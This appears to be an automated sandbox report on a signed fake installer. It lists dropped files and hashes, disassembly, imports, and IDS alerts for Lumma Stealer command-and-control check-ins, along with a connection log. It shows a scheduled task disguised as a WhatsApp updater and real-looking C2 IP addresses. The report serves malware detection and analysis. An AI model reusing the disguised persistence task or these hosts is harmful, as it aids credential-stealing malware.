                                                                                                                      SSDEEP:48:cghUsneYWM1q8YuFdOFQO033ODOiQdKrZLRY4v:Hh3t1bYuFdOFQOMdKrZLv
                                                                                                                      MD5:66DE708C5BDDF15322A95F29747A94C8
                                                                                                                      SHA1:48836F6D40DDC8B1A39704EA447514C4B31CF010
                                                                                                                      SHA-256:77020648C6B89E1ECE72DBA36770C99DF2FAF22720B48954F779D6E97D3C1F7C
                                                                                                                      SHA-512:52A61E84CEE3F5746C6F283D112BE9F5540D1C93A5BCA219CB4CD19CE95AF0D102CC6C94DC1129F50634CAB87522DE6CFD674C9B94E70BD97E35A0CA7130B4D0
                                                                                                                      Malicious:true
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Description>Keeps your WhatsApp Desktop application synchronized with essential updates and system improvements. Disabling this task could lead to missed security patches and performance optimizations, potentially impacting WhatsApp Desktop stability. This task will uninstall itself if WhatsApp Desktop no longer relies on it.</Description>. </RegistrationInfo>. <Triggers>. <TimeTrigger>. <Repetition>. <Interval>PT5M</Interval>. <Duration>PT9M</Duration>. <StopAtDurationEnd>true</StopAtDurationEnd>. </Repetition>. <StartBoundary>2025-03-07T21:15:37</StartBoundary>. <Enabled>true</Enabled>. </TimeTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>.
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):872079
                                                                                                                      Entropy (8bit):7.999807731924545
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:24576:1iogHB5rPWDwQ76O6+UTmIlEEEqf4odxz84j60baO:0B57uD6DKIS+4od5j6s3
                                                                                                                      MD5:A00434CD4070751DB9FEA5D285239290
                                                                                                                      SHA1:A3E17391476A50D36B333D1628307B9B39E46CE4
                                                                                                                      SHA-256:E4480CC6CF5996E19F86B8A453EF18B69BC81B2246FC7B72E6A5CBA3E8294EC2
                                                                                                                      SHA-512:F749C479F89FF63789F37D17E52B11A497D7F8261CBA085694733F2B9418A84CB832E8C81E28780C343FAF4148B65996952C785E20997DD1CABEDDFC279894C3
                                                                                                                      Malicious:false
                                                                                                                      Preview:PK........5.YZ\..#.M..........willrandom.exe.%.B.\.vg..........K.".f..M..../.~[..d=.z@.<...J&....1.%q?Q=A...bY.<)........F..Ki{.;Si.....xd..|[...0&_..?.].c.&aZ.R;.....^-..^.....K.......9....T=...0$.p....;]..v..*,.6...F....".}[nq..TT .$...5B......).@&:Is.vQ...h5..WP..6..).O_.$K...C.x?0.i....u3C.6C.c(`...E.Q.A...`C.G1.4."..f.9.Y....:h.RMTs.<.`...g.....|.g..~..,..*l..!....X&..wg..L.qU....}....%W.%.9....b.2g8....ds.^h..Y.E...................L..5.L...!j.....[....).C}...48.4......&.....a]..{...c..a4..}X...@..&.Zu.&.cu......SO.d?......_dz.....m....ab...kzv...M+I..g9...v.b..|...E....^0....+..n..l{....,z...wCtr.N...6.=.5...9.i%.(......j..[....u.4..".U....{.& aK.y.34.2.[.>M....J.n8.2jJ.8.C..;.vC...lW..U. ....*..,.)...3nY.]..]-Q!B../!.}.vG[b..........(.;.x.;..G.+.........u./..?E.B..Ed.qX2..YP.V.7.%+.I..nk.....4b............qGX/.|._..C.Z.........}d. ..q}.......W.0.u....=Dyb......=...u......:..k..U@m>.u..'...*Rh/.x..T.....Y..E.U.t*...1.....>.+...
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe
                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):508
                                                                                                                      Entropy (8bit):5.0513362940619775
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:AMpnOMvotkMylHcAxXF2Saiewkn23fzIsEBWrlST3wkn23fzIsCv1Aiewkn23fz0:pt6wnRwsfT4TAfCqYfebeQJA1tNoVtv
                                                                                                                      MD5:C574476CB7F806938DDA7E9F3D20A282
                                                                                                                      SHA1:6499859081EE693C14957A6DC8D8F6B14B1FD77C
                                                                                                                      SHA-256:6A2383C095E5554E5B32EA6F4682B8C302234E2D05ADD6FD070A186D6438604F
                                                                                                                      SHA-512:934F67163D144380D3D039451BF67B6318CD24E4BE77742A96727C6B4640E6597D3BA85BDBC40B03B17C3AA08C9B7CB2DB03E4D68504BF01A15D2E4BDB8777E0
                                                                                                                      Malicious:false
                                                                                                                      Preview:..7-Zip (a) 24.05 (x86) : Copyright (c) 1999-2024 Igor Pavlov : 2024-05-14....Scanning the drive for archives:.. 0M Scan C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\. .1 file, 872079 bytes (852 KiB)....Extracting archive: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs..--..Path = C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs..Type = zip..Physical Size = 872079.... 0%. .Everything is Ok....Size: 1427456..Compressed: 872079..
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.866381639014143
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                                                      • Inno Setup installer (109748/4) 1.08%
                                                                                                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      File name:Magic_V_pro_setup_stable_latest_release_version_9_709.exe
                                                                                                                      File size:3'548'416 bytes
                                                                                                                      MD5:4f4e6dd4d4b9d96e69b7f8f97e867023
                                                                                                                      SHA1:51db1de1d11976911dee96ed18b1fc903ea16676
                                                                                                                      SHA256:43b9bb932501d8d186d9fd49ee5fa1a1c47283e1db898a68b5c846eb7b971aee
                                                                                                                      SHA512:dfc58630f2fedddbbedd7a27143fd5334182882e7d124a40d9f9f38eea09802a785d7d0d71082a90f885136c57a8e65986493c97fb9b4f306a76ddc33701f904
                                                                                                                      SSDEEP:98304:61QTsRIY+m6UVFUeY5CwAJj3aohMvl6t82B:mbRItvUIeY5CVJTaohMvot82B
                                                                                                                      TLSH:59F50227B288A53EC4AE27354673A01058FBBAADF4177E1677F0C48CCF661C11E3A665
                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                      Icon Hash:2f232d67b7934633
                                                                                                                      Entrypoint:0x4a7ed0
                                                                                                                      Entrypoint Section:.itext
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x5DA1B5ED [Sat Oct 12 11:15:57 2019 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:6
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:6
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:6
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:eb5bc6ff6263b364dfbfb78bdb48ed59
                                                                                                                      Signature Valid:true
                                                                                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                      Error Number:0
                                                                                                                      Not Before, Not After
                                                                                                                      • 25/02/2025 19:15:06 25/02/2026 11:06:59
                                                                                                                      Subject Chain
                                                                                                                      • CN=NOBIS LLC, O=NOBIS LLC, STREET="p Razvilka proyezd Proyektiruyemyy N5537, 4 Tsekh Kompressorn. No.1 K. 17", L=Vidnoye, S=Moscow Oblast, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow Oblast, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1105003003390, OID.2.5.4.15=Private Organization
                                                                                                                      Version:3
                                                                                                                      Thumbprint MD5:BD805C8B63C8B5305BBF421B7D75F321
                                                                                                                      Thumbprint SHA-1:C10322D45BAAA43A3F8575C2FA56C9252CC98CA8
                                                                                                                      Thumbprint SHA-256:869FFB4DCE5270739ADEFD56C4B0CB86E84241E76CD39D3F8EEAD4550206628F
                                                                                                                      Serial:3931A71B7B628759789BA848
                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      add esp, FFFFFFA4h
                                                                                                                      push ebx
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      xor eax, eax
                                                                                                                      mov dword ptr [ebp-3Ch], eax
                                                                                                                      mov dword ptr [ebp-40h], eax
                                                                                                                      mov dword ptr [ebp-5Ch], eax
                                                                                                                      mov dword ptr [ebp-30h], eax
                                                                                                                      mov dword ptr [ebp-38h], eax
                                                                                                                      mov dword ptr [ebp-34h], eax
                                                                                                                      mov dword ptr [ebp-2Ch], eax
                                                                                                                      mov dword ptr [ebp-28h], eax
                                                                                                                      mov dword ptr [ebp-14h], eax
                                                                                                                      mov eax, 004A2BC4h
                                                                                                                      call 00007F8BC151E17Dh
                                                                                                                      xor eax, eax
                                                                                                                      push ebp
                                                                                                                      push 004A85C2h
                                                                                                                      push dword ptr fs:[eax]
                                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                                      xor edx, edx
                                                                                                                      push ebp
                                                                                                                      push 004A857Eh
                                                                                                                      push dword ptr fs:[edx]
                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                      mov eax, dword ptr [004B0634h]
                                                                                                                      call 00007F8BC15B227Bh
                                                                                                                      call 00007F8BC15B1DD2h
                                                                                                                      lea edx, dword ptr [ebp-14h]
                                                                                                                      xor eax, eax
                                                                                                                      call 00007F8BC15337A8h
                                                                                                                      mov edx, dword ptr [ebp-14h]
                                                                                                                      mov eax, 004B3714h
                                                                                                                      call 00007F8BC1518A07h
                                                                                                                      push 00000002h
                                                                                                                      push 00000000h
                                                                                                                      push 00000001h
                                                                                                                      mov ecx, dword ptr [004B3714h]
                                                                                                                      mov dl, 01h
                                                                                                                      mov eax, dword ptr [00423698h]
                                                                                                                      call 00007F8BC153480Fh
                                                                                                                      mov dword ptr [004B3718h], eax
                                                                                                                      xor edx, edx
                                                                                                                      push ebp
                                                                                                                      push 004A852Ah
                                                                                                                      push dword ptr fs:[edx]
                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                      call 00007F8BC15B2303h
                                                                                                                      mov dword ptr [004B3720h], eax
                                                                                                                      mov eax, dword ptr [004B3720h]
                                                                                                                      cmp dword ptr [eax+0Ch], 01h
                                                                                                                      jne 00007F8BC15B8BBAh
                                                                                                                      mov eax, dword ptr [004B3720h]
                                                                                                                      mov edx, 00000028h
                                                                                                                      call 00007F8BC1535104h
                                                                                                                      mov edx, dword ptr [004B3720h]
                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0xb60000x9a.edata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb40000xf1c.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb90000x5acc.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x35fbd00x2930
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xb80000x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xb42e00x240.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb50000x1a4.didata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000xa50e80xa5200f082ee6260fd65bd4406603aefa5b38aFalse0.35601136686222556data6.369284753795082IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .itext0xa70000x16680x180001fc0e6510748ac1fa24729bd4c8d31dFalse0.541015625data5.951810643537571IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .data0xa90000x37a40x380034fa73ad8332bf3785e4314a4334a782False0.36063058035714285data5.035168539011174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .bss0xad0000x67780x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .idata0xb40000xf1c0x1000daddecfdccd86a491d85012d9e547c63False0.36474609375data4.791610915860562IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .didata0xb50000x1a40x200be0581a07bd7d21a29f93f8752d3e826False0.345703125data2.7458225536678693IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .edata0xb60000x9a0x200c7a09d734ff63f677dfd4d18e3440fdfFalse0.2578125data1.881069204504408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .tls0xb70000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rdata0xb80000x5d0x200955f17d4899f3cf7664168fa46e1b316False0.189453125data1.3799881252217987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0xb90000x5acc0x5c0063aa3c5851a8624416f1023d843c0f2eFalse0.3392917798913043data4.968005209574528IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0xb95280x128Device independent bitmap graphic, 16 x 32 x 4, image size 192, 16 important colorsEnglishUnited States0.6317567567567568
                                                                                                                      RT_ICON0xb96500x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.5823699421965318
                                                                                                                      RT_ICON0xb9bb80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640, 16 important colorsEnglishUnited States0.5120967741935484
                                                                                                                      RT_ICON0xb9ea00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.5455776173285198
                                                                                                                      RT_ICON0xba7480x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.36341463414634145
                                                                                                                      RT_ICON0xbadb00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.423773987206823
                                                                                                                      RT_STRING0xbbc580x360data0.34375
                                                                                                                      RT_STRING0xbbfb80x260data0.3256578947368421
                                                                                                                      RT_STRING0xbc2180x45cdata0.4068100358422939
                                                                                                                      RT_STRING0xbc6740x40cdata0.3754826254826255
                                                                                                                      RT_STRING0xbca800x2d4data0.39226519337016574
                                                                                                                      RT_STRING0xbcd540xb8data0.6467391304347826
                                                                                                                      RT_STRING0xbce0c0x9cdata0.6410256410256411
                                                                                                                      RT_STRING0xbcea80x374data0.4230769230769231
                                                                                                                      RT_STRING0xbd21c0x398data0.3358695652173913
                                                                                                                      RT_STRING0xbd5b40x368data0.3795871559633027
                                                                                                                      RT_STRING0xbd91c0x2a4data0.4275147928994083
                                                                                                                      RT_RCDATA0xbdbc00x10data1.5
                                                                                                                      RT_RCDATA0xbdbd00x2c4data0.6384180790960452
                                                                                                                      RT_RCDATA0xbde940x2cdata1.2045454545454546
                                                                                                                      RT_GROUP_ICON0xbdec00x5adataEnglishUnited States0.7333333333333333
                                                                                                                      RT_VERSION0xbdf1c0x584dataEnglishUnited States0.26274787535410765
                                                                                                                      RT_MANIFEST0xbe4a00x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
                                                                                                                      DLLImport
                                                                                                                      kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                                      comctl32.dllInitCommonControls
                                                                                                                      version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                      user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                                      oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                                      netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                                      advapi32.dllRegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
                                                                                                                      NameOrdinalAddress
                                                                                                                      TMethodImplementationIntercept30x453ac0
                                                                                                                      __dbk_fcall_wrapper20x40d3dc
                                                                                                                      dbkFCallWrapperAddr10x4b063c
                                                                                                                      DescriptionData
                                                                                                                      CommentsThis installation was built with Inno Setup.
                                                                                                                      CompanyNameNash Norton, Inc.
                                                                                                                      FileDescriptionJeron
                                                                                                                      FileVersion1.0.2.2
                                                                                                                      LegalCopyright
                                                                                                                      OriginalFileName
                                                                                                                      ProductNameJeron
                                                                                                                      ProductVersion1.0.2.2
                                                                                                                      Translation0x0000 0x04b0
                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States
                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2025-03-08T03:14:26.697100+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449717104.18.111.161443TCP
                                                                                                                      2025-03-08T03:14:29.297286+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449719164.132.58.105443TCP
                                                                                                                      2025-03-08T03:14:49.607822+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449727172.67.194.165443TCP
                                                                                                                      2025-03-08T03:14:50.090104+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449727172.67.194.165443TCP
                                                                                                                      2025-03-08T03:14:50.090104+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449727172.67.194.165443TCP
                                                                                                                      2025-03-08T03:14:51.824281+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449728172.67.194.165443TCP
                                                                                                                      2025-03-08T03:15:41.810908+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449729172.67.194.165443TCP
                                                                                                                      2025-03-08T03:15:42.293386+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449729172.67.194.165443TCP
                                                                                                                      2025-03-08T03:15:42.293386+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449729172.67.194.165443TCP
                                                                                                                      2025-03-08T03:15:44.107187+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.194.165443TCP
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Mar 8, 2025 03:14:24.904486895 CET49717443192.168.2.4104.18.111.161
                                                                                                                      Mar 8, 2025 03:14:24.904580116 CET44349717104.18.111.161192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:24.904664040 CET49717443192.168.2.4104.18.111.161
                                                                                                                      Mar 8, 2025 03:14:24.907175064 CET49717443192.168.2.4104.18.111.161
                                                                                                                      Mar 8, 2025 03:14:24.907213926 CET44349717104.18.111.161192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:26.697002888 CET44349717104.18.111.161192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:26.697099924 CET49717443192.168.2.4104.18.111.161
                                                                                                                      Mar 8, 2025 03:14:26.702001095 CET49717443192.168.2.4104.18.111.161
                                                                                                                      Mar 8, 2025 03:14:26.702029943 CET44349717104.18.111.161192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:26.702436924 CET44349717104.18.111.161192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:26.745959997 CET49717443192.168.2.4104.18.111.161
                                                                                                                      Mar 8, 2025 03:14:26.773997068 CET49717443192.168.2.4104.18.111.161
                                                                                                                      Mar 8, 2025 03:14:26.820338011 CET44349717104.18.111.161192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:27.348328114 CET44349717104.18.111.161192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:27.348470926 CET44349717104.18.111.161192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:27.348548889 CET49717443192.168.2.4104.18.111.161
                                                                                                                      Mar 8, 2025 03:14:27.350883007 CET49717443192.168.2.4104.18.111.161
                                                                                                                      Mar 8, 2025 03:14:27.350941896 CET44349717104.18.111.161192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:27.391495943 CET49719443192.168.2.4164.132.58.105
                                                                                                                      Mar 8, 2025 03:14:27.391565084 CET44349719164.132.58.105192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:27.391665936 CET49719443192.168.2.4164.132.58.105
                                                                                                                      Mar 8, 2025 03:14:27.392154932 CET49719443192.168.2.4164.132.58.105
                                                                                                                      Mar 8, 2025 03:14:27.392178059 CET44349719164.132.58.105192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:29.297152996 CET44349719164.132.58.105192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:29.297286034 CET49719443192.168.2.4164.132.58.105
                                                                                                                      Mar 8, 2025 03:14:29.330991030 CET49719443192.168.2.4164.132.58.105
                                                                                                                      Mar 8, 2025 03:14:29.331068993 CET44349719164.132.58.105192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:29.331533909 CET44349719164.132.58.105192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:29.355928898 CET49719443192.168.2.4164.132.58.105
                                                                                                                      Mar 8, 2025 03:14:29.400353909 CET44349719164.132.58.105192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:30.111773968 CET44349719164.132.58.105192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:30.111870050 CET44349719164.132.58.105192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:30.112030029 CET49719443192.168.2.4164.132.58.105
                                                                                                                      Mar 8, 2025 03:14:30.115581036 CET49719443192.168.2.4164.132.58.105
                                                                                                                      Mar 8, 2025 03:14:30.115614891 CET44349719164.132.58.105192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:30.115638018 CET49719443192.168.2.4164.132.58.105
                                                                                                                      Mar 8, 2025 03:14:30.115648031 CET44349719164.132.58.105192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:30.413836956 CET49721443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:30.413878918 CET44349721190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:30.413949013 CET49721443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:30.414840937 CET49721443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:30.414854050 CET44349721190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:32.169879913 CET44349721190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:32.169945002 CET49721443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:32.195110083 CET49721443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:32.195147038 CET44349721190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:32.196093082 CET44349721190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:32.196229935 CET49721443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:32.196645975 CET49721443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:32.240333080 CET44349721190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:32.646811008 CET44349721190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:32.646871090 CET49721443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:32.649214983 CET49721443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:32.649291992 CET44349721190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:32.649444103 CET49721443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:32.659291029 CET49724443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:32.659351110 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:32.659418106 CET49724443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:32.659759998 CET49724443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:32.659780979 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:34.441905022 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:34.441996098 CET49724443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:34.444916010 CET49724443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:34.444928885 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:34.445259094 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:34.445430040 CET49724443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:34.445883036 CET49724443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:34.488331079 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:34.919311047 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:34.919406891 CET49724443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:34.919437885 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:34.919492006 CET49724443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:35.008663893 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:35.008690119 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:35.008737087 CET44349724190.92.154.206192.168.2.4
                                                                                                                      Mar 8, 2025 03:14:35.008750916 CET49724443192.168.2.4190.92.154.206
                                                                                                                      Mar 8, 2025 03:14:35.008817911 CET49724443192.168.2.4190.92.154.206
